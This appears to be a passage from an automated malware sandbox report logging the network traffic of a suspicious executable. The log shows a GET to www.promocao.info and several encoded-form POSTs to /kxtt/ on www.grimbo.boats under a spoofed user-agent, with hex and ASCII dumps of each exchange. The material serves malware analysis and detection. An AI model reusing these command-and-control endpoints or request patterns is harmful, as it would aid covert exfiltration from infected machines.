                                                                      Data Ascii: 88v07=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd+yBUYpYtzFDzDpYOvMdSWAzwhwPbX/m65QiFnCR0b16FNiMUk6Z9q96YT2ZImUhQaGO3niUk0kvRnjQZvp6hMi9zLP0zHfUmnbpIZFwpksS4W6bT7+W304QRqxX2Pg378UM8lhzkwi7XWFdZ5ppa1Va/GqVqZdlTyDNuNlSE7xf8F6tVh2Ra7HC0d+pWfBc6vrl+YsAx/u1LDh4cKUByHPssXdGxrldcr7B6K1629XFE72IlwtdFIcsb7vnw1yjcJ0HSpVJi897CkdzI/zwUn0OFuTyv4LRRdH5dHNMkg0EezYzTjb/U6FNPRTMMJKi5lzMhfK1FrPRGliAUx/6cN99WTrbx3psfo8aUuw7wax+EUu6kfB70nukuerBPx7tIz7EOdznTmoZdpqgzwIrq4eNpt6ZRhdHIaM+8SvbMYmjXdFg0d4s/Najr1UhD3t3qBmx8Oj6CJkvHuPUatGaxvXY51/iWiPTJbHwJEBFVzJAVc6PFIfsQBq0jzai8vDBupHFRxWuBp8GJ95FMwJqeEo+YyrcAJcjVQua/Cz3MIbVnRiUiiyZw2ceq+QTv6F/l5WPBj8GYhs5cArWMXbyb8PSsUTKSyLW310PbZs7AFKjAendXg2NY1H5XysE43Y8fSZ4FCDLhjvclx8EfMjn7w2zVrPX7IAoXeZq9adtVIEN1Bxa3vTpI958L3ASe6msFjct4vQZcwLJwCFKHqO96t4sNREgibBPFxjVDqTSm3ER61B6+ZmFh6e9AKNXxMxWPj8s1SETNye+lCV0CcriW9SxKQcvVbKTaGxfMM5KklqDGTXCTHgvXQJduOLsKf5vjQlMuZ [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.44993884.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:26.055457115 CET467OUTGET /zaz4/?88v07=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.promocao.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:39:26.531467915 CET1236INHTTP/1.1 200 OK
                                                                      Date: Mon, 13 Jan 2025 08:39:26 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 9973
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Server: hcdn
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      x-hcdn-request-id: 9dd8e3d4e2d3905eac76cb63d9c75b76-bos-edge3
                                                                      Expires: Mon, 13 Jan 2025 08:39:25 GMT
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                      Jan 13, 2025 09:39:26.531527042 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                      Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                      Jan 13, 2025 09:39:26.531560898 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                      Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                      Jan 13, 2025 09:39:26.531593084 CET672INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                      Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                      Jan 13, 2025 09:39:26.531625986 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                      Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                                      Jan 13, 2025 09:39:26.531658888 CET1236INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                      Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                                      Jan 13, 2025 09:39:26.531698942 CET1236INData Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                                      Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                                      Jan 13, 2025 09:39:26.531730890 CET1236INData Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                                      Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                                      Jan 13, 2025 09:39:26.531768084 CET988INData Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                                      Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449975172.67.182.198805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:31.580159903 CET734OUTPOST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 2f 6f 34 50 78 73 74 74 78 4c 56 72 4e 58 45 70 77 5a 7a 53 41 58 65 34 51 57 4c 41 35 58 6c 6b 41 3d 3d
                                                                      Data Ascii: 88v07=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4/o4PxsttxLVrNXEpwZzSAXe4QWLA5XlkA==
                                                                      Jan 13, 2025 09:39:32.203723907 CET1096INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:39:32 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FPyAqkjR9vhGobRp8XUiZcIDx9BAFl0iakDJjSiaokFsdH03YpCrPhdyHDjYx5YUbwFoc%2Fm%2FvY%2FMHnnv3dAbtAd%2F8POt4tfvSXe%2B4MFpXcvVGVM2UDPsClH9HtI%2Fiby5Q5r"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 90141388c8e90f9c-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1725&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449993172.67.182.198805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:34.128910065 CET754OUTPOST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 7a 74 6c 58 66 2f 4e 36 71 73 2f 4a 47 4f 35 6f 44 67 7a 39 35 41 75 37 6a 33 47 45 6e 59 61 74 30 3d
                                                                      Data Ascii: 88v07=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAAztlXf/N6qs/JGO5oDgz95Au7j3GEnYat0=
                                                                      Jan 13, 2025 09:39:34.749556065 CET1085INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:39:34 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFE8vadtxjtdkMOGfMJd6BtKQZTQQFvov9SMQL%2FsEo04RBTAd9H7sL96wkGYNsJ%2FfBPdFAUanC9cRmvN1f6QwTCJkHEkd%2BYIp88EpDGHJ6S0pe4Yy6SlGxqSkdLe7uvSLH6%2F"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 90141398b93042fd-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=754&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.450010172.67.182.198805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:36.670418978 CET10836OUTPOST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 66 74 69 50 79 48 76 42 49 34 5a 51 72 49 33 67 7a 62 45 49 44 6f 2b 4c 71 48 2b 39 66 30 6e 38 4a 4a 6a 38 57 77 63 78 50 74 50 4a 46 35 64 51 50 56 45 6c 4c 73 77 71 4e 48 33 42 7a 32 39 6a 53 73 54 39 64 4b 4b 50 74 59 58 62 35 2f 47 36 64 52 4c 6e 63 59 75 52 43 53 75 32 68 6e 38 4a 33 68 73 39 61 56 39 51 36 59 34 4e 63 37 6e 49 6d 78 74 65 78 39 33 31 76 78 37 54 31 6e 33 69 52 48 37 72 43 31 70 66 78 5a 33 78 30 6c 65 61 42 57 79 4b 78 70 61 39 76 2f 78 31 47 6c 35 48 55 6b [TRUNCATED]
                                                                      Data Ascii: 88v07=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoAftiPyHvBI4ZQrI3gzbEIDo+LqH+9f0n8JJj8WwcxPtPJF5dQPVElLswqNH3Bz29jSsT9dKKPtYXb5/G6dRLncYuRCSu2hn8J3hs9aV9Q6Y4Nc7nImxtex931vx7T1n3iRH7rC1pfxZ3x0leaBWyKxpa9v/x1Gl5HUkXR+JHWSi1ScDajLEY61lYUShhOP+yKN9xeRv6mPIKR3aVyF9lFQIhgotY+c1lKY80jR62VVg9JTCTGkLZLRmU8sYXWT2Qd/H/SQ2/Z6kxOEZVe+sRTloM+TdzFutBz2W7pcywZBjWBnIjZMxtE/nwy41mNOEJwnuNBvn7inys206mttnV2u+xowz8CBy049O8QBoReZFsEhEs8oTb0Zl64ADvK0+DLrjfDnJTds9VUPZY9BgI4hKl3v3Ttm2Vh6+aGct8bsJ2Xr1Ttqp/hf8S49lCE0HOhU6zu+m4qtfEM4qVuEKBYJzdg85xmn6NyH2YtvA8lG52YdoQ8/ZArE9jMIz6/iO97fWkxk9ySkbEwqyjtoNTIzdWpI/UuZLBlj0mWU0Tgqx+FGmoRMiQxAfEf9hWZCRTT12VwOios34Xvqd2s7ugZQn50ups3zuc8Ft05fp3tX1F9bKPAbT8e2PIGj3DNza0FhQnNPM3C6FvXkvL/VCdPTH0eydAoxf4Q1rC6Tosc/gN7zbljconzTBIXkXxAWnLIp6Mf1/nVcUcuMFnXs7Wkr2LDaFmYfo33ruh9aPklPJoKp1r3gfQkgVxtLi1fzGLRw21pSXCSGq38fOJmnFHK4X+Q0MDdM+do88WQnrDFzoJKvXl5D6iPtCcQB08i1H+V0nA6 [TRUNCATED]
                                                                      Jan 13, 2025 09:39:37.289658070 CET1093INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:39:37 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtQncH%2FmKiNoylO%2FTPJLTiENZ15c8oOEFwQvxNfbXgdcKtL8p0vN%2FBbpKkWcPNC4HnB9qfV4NBmJ%2FGrb8oFx451LzSNRrcIAkG4r4Tb3mrN6r5gch77KezQ4NmS7lfRK9zWN"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 901413a89e8c43bc-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10836&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
